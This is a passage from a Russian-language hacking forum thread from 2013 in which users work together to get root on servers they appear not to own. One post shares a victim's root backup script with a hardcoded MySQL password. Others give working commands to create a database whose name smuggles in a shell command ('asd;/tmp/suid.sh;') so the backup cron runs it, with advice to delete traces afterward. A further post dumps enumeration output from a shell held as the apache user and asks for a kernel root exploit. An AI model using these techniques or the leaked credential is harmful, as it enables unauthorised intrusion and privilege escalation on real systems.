Старый 30.07.2013, 20:56   #911
chupakabra
 
Аватар для chupakabra
 
Регистрация: 09.12.2011
Сообщений: 47
Репутация: 5
По умолчанию

Kamnupre
ls -lia /usr/local/bin/; cat /usr/local/bin/backup.sh
chupakabra вне форума   Ответить с цитированием
Старый 30.07.2013, 21:13   #912
Kamnupre
 
Аватар для Kamnupre
 
Регистрация: 09.06.2013
Сообщений: 13
Репутация: -1
По умолчанию

Цитата:
Сообщение от chupakabra Посмотреть сообщение
Kamnupre
ls -lia /usr/local/bin/; cat /usr/local/bin/backup.sh
Код:
total 12
11125621 drwxr-xr-x  2 root root 4096 Jun 26  2012 .
11125619 drwxr-xr-x 12 root root 4096 Apr 20  2012 ..
11130001 -rwxr-xr-x  1 root root 1356 Jun 26  2012 backup.sh
#!/bin/bash

dir=`hostname`
host='HIDE'
rdiff='/usr/bin/rdiff-backup --remote-tempdir tmp --exclude-special-files --ssh-no-compression --no-compression'
keep=14B
rdiff_remove="/usr/bin/ssh $host /usr/bin/rdiff-backup --verbosity 2 --force --remove-older-than $keep"
vhosts_dir='/var/www/vhosts'
remote_config="$dir/config"
remote_vhosts="$dir/vhosts"
#grant all on *.* to mysql_backup@localhost identified by 'dfK286';
DB_ACCESS="-u mysql_backup -pdfK286"
BASES=`/bin/echo "SHOW DATABASES" | /usr/bin/mysql $DB_ACCESS | grep -v Database | grep -v information_schema`
BASES_PATH=/var/backup/db
remote_bases="$dir/db"
mysqldump="/usr/bin/mysqldump --force --quick --default-character-set=utf8 $DB_ACCESS"

ssh -o StrictHostKeyChecking=no $host mkdir -p $dir

ssh $host mkdir -p $remote_config
$rdiff --include-globbing-filelist-stdin --exclude '*' / $host::$remote_config <<EOF
/etc/*
/var/spool/cron/*
/var/log/rpmpkgs
/usr/local/bin/backup.sh
/var/named/chroot/etc
/var/named/chroot/var/named
EOF
$rdiff_remove $remote_config

ssh $host mkdir -p $remote_vhosts
for a in `ls -1 $vhosts_dir`;do
$rdiff $vhosts_dir/$a $host::$remote_vhosts/$a
$rdiff_remove $remote_vhosts/$a
done

mkdir -p $BASES_PATH
for base in $BASES; do
    $mysqldump $base > $BASES_PATH/$base.sql
done

$rdiff $BASES_PATH $host::$remote_bases
$rdiff_remove $remote_bases
Kamnupre вне форума   Ответить с цитированием
Старый 31.07.2013, 10:36   #913
SynQ
 
Регистрация: 11.07.2010
Сообщений: 953
Репутация: 352
По умолчанию

Kamnupre
Пароль к mysql есть. Теперь:

Код:
BASES=`/bin/echo "SHOW DATABASES" | /usr/bin/mysql $DB_ACCESS | grep -v Database | grep -v information_schema`
...
for base in $BASES; do
    $mysqldump $base > $BASES_PATH/$base.sql
Поиграй с созданием БД так, чтобы в имени оказалось что-нибудь вроде "name;/tmp/my-script-to-root-this-box.sh"
Если сработает, и mysql позволит указать такие спец-символы в названии БД, то потом не забудь удалить $BASES_PATH/$base.sql

PS Вместо ";" можно попробовать \r, \n и т.п.

Последний раз редактировалось SynQ; 31.07.2013 в 10:38..
SynQ вне форума   Ответить с цитированием
Старый 31.07.2013, 13:12   #914
chupakabra
 
Аватар для chupakabra
 
Регистрация: 09.12.2011
Сообщений: 47
Репутация: 5
По умолчанию

SynQ +1

Код:
mysql -u mysql_backup -pdfK286
Код:
mysql> create database `asd;/tmp/suid.sh;`;
Query OK, 1 row affected (0.00 sec)

mysql> show databases;
+----------------------+
| Database             |
+----------------------+
| information_schema   |
| asd;/tmp/suid.sh;    |
...

Последний раз редактировалось chupakabra; 31.07.2013 в 13:16..
chupakabra вне форума   Ответить с цитированием
Старый 31.07.2013, 14:17   #915
Kamnupre
 
Аватар для Kamnupre
 
Регистрация: 09.06.2013
Сообщений: 13
Репутация: -1
По умолчанию

Ввожу mysql -u mysql_backup -p dfK286
Терминал зависает.
Kamnupre вне форума   Ответить с цитированием
Старый 31.07.2013, 14:25   #916
b3
 
Аватар для b3
 
Регистрация: 18.08.2010
Сообщений: 353
Репутация: 105
По умолчанию

Так попробуй
Цитата:
echo 'create database `asd;/tmp/suid.sh;`;' | mysql -u mysql_backup -pdfK286
b3 вне форума   Ответить с цитированием
Старый 03.08.2013, 10:14   #917
nomad
 
Аватар для nomad
 
Регистрация: 23.07.2010
Сообщений: 179
Репутация: 7
По умолчанию

Вроде в ютубе есть видео по рутанью данного ядра, но в паблике сплойта не видел. Может, есть у кого?
Код:
**************************************************
*             general information                *
*                                                *
**************************************************
[+]id:
uid=48(apache) gid=48(apache) groups=48(apache)
[+]uanme -a:
Linux web.hoster.ru 2.6.18-194.32.1.el5PAE #1 SMP Wed Jan 5 18:43:13 EST 2011 i686 i686 i386 GNU/Linux

[+]cat /proc/version:
Linux version 2.6.18-194.32.1.el5PAE (admin@builder10.centos.org) (gcc version 4.1.2 20080704 (Red Hat 4.1.2-48)) #1 SMP Wed Jan 5 18:43:13 EST 2011

[+]cat /proc/cpuinfo:
processor	: 0
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 0
cpu cores	: 4
apicid		: 0
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3192.08

processor	: 1
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 1
cpu cores	: 4
apicid		: 1
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3191.86

processor	: 2
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 2
cpu cores	: 4
apicid		: 2
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3191.93

processor	: 3
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 0
siblings	: 4
core id		: 3
cpu cores	: 4
apicid		: 3
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3191.89

processor	: 4
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 1
siblings	: 4
core id		: 0
cpu cores	: 4
apicid		: 4
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3191.91

processor	: 5
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 1
siblings	: 4
core id		: 1
cpu cores	: 4
apicid		: 5
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3191.90

processor	: 6
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 1
siblings	: 4
core id		: 2
cpu cores	: 4
apicid		: 6
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3191.92

processor	: 7
vendor_id	: GenuineIntel
cpu family	: 6
model		: 15
model name	: Intel(R) Xeon(R) CPU           E5310  @ 1.60GHz
stepping	: 7
cpu MHz		: 1596.043
cache size	: 4096 KB
physical id	: 1
siblings	: 4
core id		: 3
cpu cores	: 4
apicid		: 7
fdiv_bug	: no
hlt_bug		: no
f00f_bug	: no
coma_bug	: no
fpu		: yes
fpu_exception	: yes
cpuid level	: 10
wp		: yes
flags		: fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe nx lm constant_tsc pni monitor ds_cpl vmx tm2 ssse3 cx16 xtpr lahf_lm
bogomips	: 3191.91


[+]cat /etc/issue:
Hoster (\n)

CentOS release 5.9 (Final)
Kernel \r on an \m


[+]cat /etc/issue.net:
CentOS release 5.9 (Final)
Kernel \r on an \m
Redhat Release: CentOS release 5.9 (Final)

[+]who online (w):
 10:30:09 up 855 days, 17:17,  0 users,  load average: 3.53, 2.81, 2.40
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT

[+]proccess list wide tree (ps axfuw):
USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND
root         1  0.0  0.0   2176   608 ?        Ss    2011   3:38 init [3]         
root         2  0.0  0.0      0     0 ?        S<    2011   0:33 [migration/0]
root         3  0.0  0.0      0     0 ?        SN    2011   2:54 [ksoftirqd/0]
root         4  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/0]
root         5  0.0  0.0      0     0 ?        S<    2011   0:40 [migration/1]
root         6  0.0  0.0      0     0 ?        SN    2011   0:05 [ksoftirqd/1]
root         7  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/1]
root         8  0.0  0.0      0     0 ?        S<    2011   0:27 [migration/2]
root         9  0.0  0.0      0     0 ?        SN    2011   0:03 [ksoftirqd/2]
root        10  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/2]
root        11  0.0  0.0      0     0 ?        S<    2011   0:29 [migration/3]
root        12  0.0  0.0      0     0 ?        SN    2011   0:03 [ksoftirqd/3]
root        13  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/3]
root        14  0.0  0.0      0     0 ?        S<    2011   0:20 [migration/4]
root        15  0.0  0.0      0     0 ?        SN    2011   0:04 [ksoftirqd/4]
root        16  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/4]
root        17  0.0  0.0      0     0 ?        S<    2011   0:50 [migration/5]
root        18  0.0  0.0      0     0 ?        SN    2011   0:04 [ksoftirqd/5]
root        19  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/5]
root        20  0.0  0.0      0     0 ?        S<    2011   0:18 [migration/6]
root        21  0.0  0.0      0     0 ?        SN    2011   0:05 [ksoftirqd/6]
root        22  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/6]
root        23  0.0  0.0      0     0 ?        S<    2011   0:46 [migration/7]
root        24  0.0  0.0      0     0 ?        SN    2011   0:04 [ksoftirqd/7]
root        25  0.0  0.0      0     0 ?        S<    2011   0:00 [watchdog/7]
root        26  0.0  0.0      0     0 ?        S<    2011   0:00 [events/0]
root        27  0.0  0.0      0     0 ?        S<    2011   0:00 [events/1]
root        28  0.0  0.0      0     0 ?        S<    2011   0:00 [events/2]
root        29  0.0  0.0      0     0 ?        S<    2011   0:00 [events/3]
root        30  0.0  0.0      0     0 ?        S<    2011   0:00 [events/4]
root        31  0.0  0.0      0     0 ?        S<    2011   0:00 [events/5]
root        32  0.0  0.0      0     0 ?        S<    2011   0:00 [events/6]
root        33  0.0  0.0      0     0 ?        S<    2011   0:00 [events/7]
root        34  0.0  0.0      0     0 ?        S<    2011   4:18 [khelper]
root        35  0.0  0.0      0     0 ?        S<    2011   0:00 [kthread]
root        45  0.0  0.0      0     0 ?        S<    2011   0:02  \_ [kblockd/0]
root        46  0.0  0.0      0     0 ?        S<    2011   0:02  \_ [kblockd/1]
root        47  0.0  0.0      0     0 ?        S<    2011   2:11  \_ [kblockd/2]
root        48  0.0  0.0      0     0 ?        S<    2011   1:43  \_ [kblockd/3]
root        49  0.0  0.0      0     0 ?        S<    2011   0:04  \_ [kblockd/4]
root        50  0.0  0.0      0     0 ?        S<    2011   0:06  \_ [kblockd/5]
root        51  0.0  0.0      0     0 ?        S<    2011   0:02  \_ [kblockd/6]
root        52  0.0  0.0      0     0 ?        S<    2011   0:02  \_ [kblockd/7]
root        53  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kacpid]
root       177  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/0]
root       178  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/1]
root       179  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/2]
root       180  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/3]
root       181  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/4]
root       182  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/5]
root       183  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/6]
root       184  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [cqueue/7]
root       187  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [khubd]
root       189  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kseriod]
root       280  0.0  0.0      0     0 ?        S     2011   0:00  \_ [khungtaskd]
root       283  0.0  0.0      0     0 ?        S<    2011 106:11  \_ [kswapd0]
root       284  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/0]
root       285  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/1]
root       286  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/2]
root       287  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/3]
root       288  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/4]
root       289  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/5]
root       290  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/6]
root       291  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [aio/7]
root       457  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kpsmoused]
root       542  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/0]
root       543  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/1]
root       544  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/2]
root       545  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/3]
root       546  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/4]
root       547  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/5]
root       548  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/6]
root       549  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata/7]
root       550  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ata_aux]
root       560  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [scsi_eh_0]
root       561  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [scsi_eh_1]
root       562  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [scsi_eh_2]
root       563  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [scsi_eh_3]
root       564  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [scsi_eh_4]
root       565  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [scsi_eh_5]
root       575  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kstriped]
root       612  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [ksnapd]
root       651  0.0  0.0      0     0 ?        D<    2011 802:34  \_ [md1_raid1]
root       655  0.0  0.0      0     0 ?        S<    2011   1:10  \_ [md0_raid1]
root       658  0.0  0.0      0     0 ?        S<    2011 845:40  \_ [kjournald]
root       678  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kauditd]
root      1274  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kedac]
root      1910  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/0]
root      1911  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/1]
root      1912  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/2]
root      1913  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/3]
root      1914  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/4]
root      1915  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/5]
root      1916  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/6]
root      1917  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpathd/7]
root      1918  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kmpath_handlerd]
root      1940  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [kjournald]
root      2427  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/0]
root      2428  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/1]
root      2429  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/2]
root      2430  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/3]
root      2431  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/4]
root      2432  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/5]
root      2433  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/6]
root      2434  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [rpciod/7]
root      6329  0.0  0.0      0     0 ?        S<    2011   0:00  \_ [nfsd4]
root     30130  0.1  0.0      0     0 ?        SN   Jan29 381:21  \_ [kipmi0]
root     25213  0.0  0.0      0     0 ?        S    Jul30   1:09  \_ [pdflush]
root     25974  0.0  0.0      0     0 ?        S    Jul30   0:33  \_ [pdflush]
root      2298  0.0  0.0   1816   556 ?        Ss    2011  71:52 syslogd -m 0
root      2301  0.0  0.0   1764   380 ?        Ss    2011   0:00 klogd -x
root      2310  0.0  0.0   2560   332 ?        Ss    2011   7:44 irqbalance
nobody    2880  0.0  0.3  92668 39464 ?        Ssl   2011 102:01 memcached -d -p 11211 -u nobody -m 256 -c 1024 -P /var/run/memcached/memcached.pid -l 127.0.0.1
root      3098  0.0  0.0   3612   352 ?        S     2011   0:04 /usr/sbin/smartd -q never
root      3101  0.0  0.0   1764   420 ttyS1    Ss+   2011   0:00 /sbin/agetty -L ttyS1 19200 vt100
rpc       8386  0.0  0.0   2016   760 ?        Ss    2011   0:03 portmap
clamav    8521  0.0  0.0 218704  1728 ?        Ss    2011  29:24 /usr/sbin/clamsmtpd -f /etc/clamsmtpd.conf -p /var/run/clamav/clamsmtpd.pid
root      8731  0.0  0.0   2360   444 ?        Ss    2011   0:00 /usr/sbin/atd
root      6251  0.0  0.0   5932   704 ?        Ss    2011   0:00 rpc.idmapd
root      6325  0.0  0.0   4040   244 ?        Ss    2011   0:00 rpc.rquotad
root      6328  0.0  0.0      0     0 ?        S     2011   0:00 [lockd]
root      6330  0.0  0.0      0     0 ?        S     2011   0:00 [nfsd]
root      6331  0.0  0.0      0     0 ?        S     2011   0:00 [nfsd]
root      6332  0.0  0.0      0     0 ?        S     2011   0:01 [nfsd]
root      6333  0.0  0.0      0     0 ?        S     2011   0:01 [nfsd]
root      6334  0.0  0.0      0     0 ?        S     2011   0:00 [nfsd]
root      6335  0.0  0.0      0     0 ?        S     2011   0:01 [nfsd]
root      6336  0.0  0.0      0     0 ?        S     2011   0:01 [nfsd]
root      6337  0.0  0.0      0     0 ?        S     2011   0:00 [nfsd]
root      6340  0.0  0.0   2024   716 ?        Ss    2011   0:07 rpc.mountd
root      7510  0.0  0.0   1748   472 tty1     Ss+   2011   0:00 /sbin/mingetty tty1
root      7512  0.0  0.0   1748   472 tty4     Ss+   2011   0:00 /sbin/mingetty tty4
root      7514  0.0  0.0   1748   468 tty5     Ss+   2011   0:00 /sbin/mingetty tty5
root      7516  0.0  0.0   1748   464 tty6     Ss+   2011   0:00 /sbin/mingetty tty6
root      7518  0.0  0.0   1748   468 tty2     Ss+   2011   0:00 /sbin/mingetty tty2
root      7520  0.0  0.0   1748   468 tty3     Ss+   2011   0:00 /sbin/mingetty tty3
ntp      20035  0.0  0.0   4512  4508 ?        SLs   2011   1:27 ntpd -u ntp:ntp -p /var/run/ntpd.pid
root     11854  0.0  0.0   5380  1116 ?        Ss    2012   0:22 crond
root     12212  0.0  0.0   1764   528 ?        Ss    2012   0:00 /usr/sbin/acpid
root     16727  0.0  0.0   5308   544 ?        Ss    2012   0:45 vsftpd: LISTENER                        
zabbix   31935  0.0  0.0   6772   784 ?        S     2012   0:00 /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix   31936  0.0  0.0   6772  1268 ?        S     2012   0:39  \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix   31937  0.0  0.0   6852  1212 ?        S     2012 195:46  \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix   31938  0.0  0.0   6852  1212 ?        S     2012 196:39  \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix   31940  0.0  0.0   6852  1212 ?        S     2012 196:48  \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix   31941  0.0  0.0   6848   932 ?        S     2012   1:04  \_ /usr/sbin/zabbix_agentd -c /etc/zabbix/zabbix_agentd.conf
zabbix   31968  0.0  0.0  46760  1780 ?        S     2012   0:00 zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31970  0.0  0.0  46760  1780 ?        S     2012  43:41  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31971  0.0  0.0  46760  1248 ?        S     2012   0:02  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31972  0.0  0.2  49604 27808 ?        S     2012  36:16  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31973  0.0  0.2  49604 27808 ?        S     2012  36:17  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31974  0.0  0.2  49604 27952 ?        S     2012  36:14  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31975  0.0  0.2  49604 27812 ?        S     2012  36:26  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31976  0.0  0.2  49604 27812 ?        S     2012  36:15  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31977  0.0  0.0  49520 11680 ?        S     2012   0:31  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31978  0.0  0.2  47180 26348 ?        S     2012   2:06  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31979  0.0  0.2  47180 26348 ?        S     2012   2:06  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31980  0.0  0.2  47180 26344 ?        S     2012   2:09  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31981  0.0  0.2  47180 26348 ?        S     2012   2:06  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31982  0.0  0.2  47180 26348 ?        S     2012   2:07  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31985  0.0  0.0  47392  9628 ?        S     2012   2:43  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31986  0.0  0.0  46768  1660 ?        S     2012   0:13  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31988  0.0  0.0  46760  1280 ?        S     2012  41:56  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31990  0.0  0.0  46760  1260 ?        S     2012   1:57  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31992  0.0  0.0  46896 10880 ?        S     2012  98:12  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31994  0.0  0.0  49204  2504 ?        S     2012   0:02  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31996  0.0  0.2  46892 26452 ?        S     2012  37:09  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   31997  0.0  0.2  46888 26424 ?        S     2012  37:05  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   32000  0.0  0.2  46888 26444 ?        S     2012  37:02  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   32001  0.0  0.2  46892 26440 ?        S     2012  37:02  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   32003  0.0  0.0  46824  1548 ?        S     2012   0:13  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   32005  0.0  0.0  46760  1196 ?        S     2012   0:00  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
zabbix   32007  0.0  0.0  46760  1004 ?        S     2012   0:00  \_ zabbix_server_mysql -c /etc/zabbix/zabbix_server.conf
600      11494  0.0  0.0   5548  1240 ?        Ss    2012   0:00 SCREEN
600      11495  0.0  0.0   4892  1428 pts/1    Ss    2012   0:00  \_ /bin/bash
600      11517  0.0  0.0   7932  2716 pts/1    S+    2012   0:00      \_ /usr/bin/mc -P /tmp/mc-webmaster/mc.pwd.11495
600      11519  0.0  0.0   4892  1440 pts/2    Ss+   2012   0:00          \_ bash -rcfile .bashrc
600      11592  0.0  0.0   6188  1316 ?        Ss    2012   0:00 SCREEN
600      11593  0.0  0.0   5648  1468 pts/3    Ss    2012   0:00  \_ /bin/bash
600      11617  0.0  0.0  10140  5224 pts/3    S+    2012   0:02      \_ /usr/bin/mc -P /tmp/mc-webmaster/mc.pwd.11593
600      11619  0.0  0.0   4892  1440 pts/4    Ss+   2012   0:00          \_ bash -rcfile .bashrc
named     4601  1.0  0.1 125000 16424 ?        Ssl  Jan08 2993:08 /usr/sbin/named -u named -t /var/named/chroot
root     28844  0.0  0.0   2280   692 ?        S<s  Jan29   0:00 /sbin/udevd -d
root     29912  0.0  0.0   2852   916 ?        Ss   Jan29   0:00 xinetd -stayalive -pidfile /var/run/xinetd.pid
root     19030  7.4  0.3  57116 49740 ?        DNs  07:24  13:47  \_ /usr/bin/rsync --daemon
rpcuser  29990  0.0  0.0   1980   748 ?        Ss   Jan29   0:00 rpc.statd
root     30201  0.0  0.0   1992   496 ?        Ss   Jan29   0:02 mdadm --monitor --scan -f --pid-file=/var/run/mdadm/mdadm.pid
root     30344  0.0  0.0   4648  1292 ?        S    Jan29   0:00 /bin/sh /usr/bin/mysqld_safe --datadir=/var/lib/mysql --socket=/var/lib/mysql/mysql.sock --pid-file=/var/run/mysqld/mysqld.pid --basedir=/usr --user=mysql
mysql    30423  4.6  1.0 239100 129024 ?       Sl   Jan29 12362:02  \_ /usr/libexec/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --log-error=/var/log/mysqld.log --socket=/var/lib/mysql/mysql.sock
root     23205  0.0  0.0   8716  2056 ?        Ss   Feb15  39:25 /usr/libexec/postfix/master
postfix  23208  0.0  0.0   8952  2256 ?        S    Feb15   3:18  \_ qmgr -l -t fifo -u
postfix  23221  0.0  0.0   8828  2196 ?        S    Feb15   1:05  \_ tlsmgr -l -t unix -u
postfix  23222  0.0  0.0   8832  2160 ?        S    Feb15   4:54  \_ anvil -l -t unix -u
postfix  28582  0.0  0.0   8800  2060 ?        S    09:25   0:00  \_ pickup -l -t fifo -u -o content_filter 
postfix  30773  0.0  0.0   8912  2500 ?        S    09:53   0:00  \_ proxymap -t unix -u
postfix  30862  0.0  0.0   8808  2396 ?        S    09:55   0:00  \_ trivial-rewrite -n rewrite -t unix -u
